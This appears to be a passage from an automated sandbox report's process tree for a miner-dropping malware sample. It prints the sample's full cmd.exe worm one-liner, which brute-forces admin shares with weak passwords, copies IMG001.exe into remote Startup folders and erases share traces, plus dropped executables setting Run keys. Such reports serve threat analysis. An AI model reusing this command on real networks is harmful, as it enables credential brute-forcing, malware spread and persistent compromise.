C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "1" /user:"administrator"6⤵PID:2568
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "1" /user:"administrator"6⤵PID:5820
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:492
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "123" /user:"administrator"6⤵PID:5224
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "123" /user:"administrator"6⤵PID:4944
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:5852
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "administrator" /user:"administrator"6⤵PID:4300
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "administrator" /user:"administrator"6⤵PID:4604
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1096
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "0208" /user:"administrator"6⤵PID:3032
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "0208" /user:"administrator"6⤵PID:3348
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4512
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ """" /user:"administrator"6⤵PID:4620
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users """" /user:"administrator"6⤵PID:4928
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:132
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "0" /user:"user"6⤵PID:4776
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "0" /user:"user"6⤵PID:6136
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:5728
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "1" /user:"user"6⤵PID:5392
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "1" /user:"user"6⤵PID:3748
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4620
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "123" /user:"user"6⤵PID:5904
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "123" /user:"user"6⤵PID:7124
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3452
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "user" /user:"user"6⤵PID:4828
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "user" /user:"user"6⤵PID:5160
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1384
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "0208" /user:"user"6⤵PID:1732
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users "0208" /user:"user"6⤵PID:6036
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5772
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ """" /user:"user"6⤵PID:3604
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\Users """" /user:"user"6⤵PID:4620
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3324
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.173\C$ "0" /user:"admin"6⤵PID:6748
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=1608& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))5⤵
- Indicator Removal: Network Share Connection Removal
PID:2860 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"6⤵
- Network Service Discovery
PID:6392 -
C:\Windows\SysWOW64\net.exenet view7⤵
- Discovers systems in the same network
PID:4960
-
-
C:\Windows\SysWOW64\find.exefind /i "\\"7⤵PID:6472
-
-
C:\Windows\SysWOW64\ARP.EXEarp -a7⤵
- Network Service Discovery
PID:4572
-
-
C:\Windows\SysWOW64\find.exefind /i " 1"7⤵PID:1432
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c set str_6⤵PID:6596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "6⤵PID:4376
-
C:\Windows\SysWOW64\net.exenet view \\10.127.0.17⤵
- Discovers systems in the same network
PID:3140
-
-
C:\Windows\SysWOW64\find.exefind /i " "7⤵PID:3872
-
-
-
C:\Windows\SysWOW64\net.exenet use * /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:1812
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5576
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:6388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:5164
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:3620
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:4960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:4008
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:5720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6328
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:6124
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:2456
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:3748
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:5596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:6060
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:6156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:6056
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:5388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:4604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:5384
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵PID:3996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:4728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:3924
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵PID:5124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:4376
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:1588
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵PID:868
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵PID:5020
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:5176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\C$\1\IMG001.exe" "6⤵PID:2848
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\C$\1\IMG001.exe"7⤵PID:1704
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:980
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:4776
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:4608
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:4656
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:4728
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:7080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:2124
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:2252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:2864
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:5796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:6048
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:3932
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:3048
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:6708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:876
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:5444
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:3316
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵PID:6864
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:4164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:4940
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵PID:4960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:4728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:7120
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵PID:5212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:2152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵PID:2992
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵PID:3424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:3936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.0.1\Users\1\IMG001.exe" "6⤵PID:3024
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.0.1\Users\1\IMG001.exe"7⤵PID:8
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:6948
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵
- Runs ping.exe
PID:2368
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- Runs ping.exe
PID:2476
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "1" /user:"1"6⤵PID:2568
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "1" /user:"1"6⤵PID:5816
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4368
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\C$ "123" /user:"1"6⤵PID:1836
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.0.1\Users "123" /user:"1"6⤵PID:3892
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3936
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"3⤵
- Executes dropped EXE
PID:4404
-
-
C:\Users\Admin\AppData\Local\Temp\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe"C:\Users\Admin\AppData\Local\Temp\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5308
-
-
C:\Users\Admin\AppData\Local\Temp\Files\r.exe"C:\Users\Admin\AppData\Local\Temp\Files\r.exe"3⤵
- Executes dropped EXE
PID:5328
-
-
C:\Users\Admin\AppData\Local\Temp\Files\dayum.exe"C:\Users\Admin\AppData\Local\Temp\Files\dayum.exe"3⤵
- Executes dropped EXE
PID:760 -
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
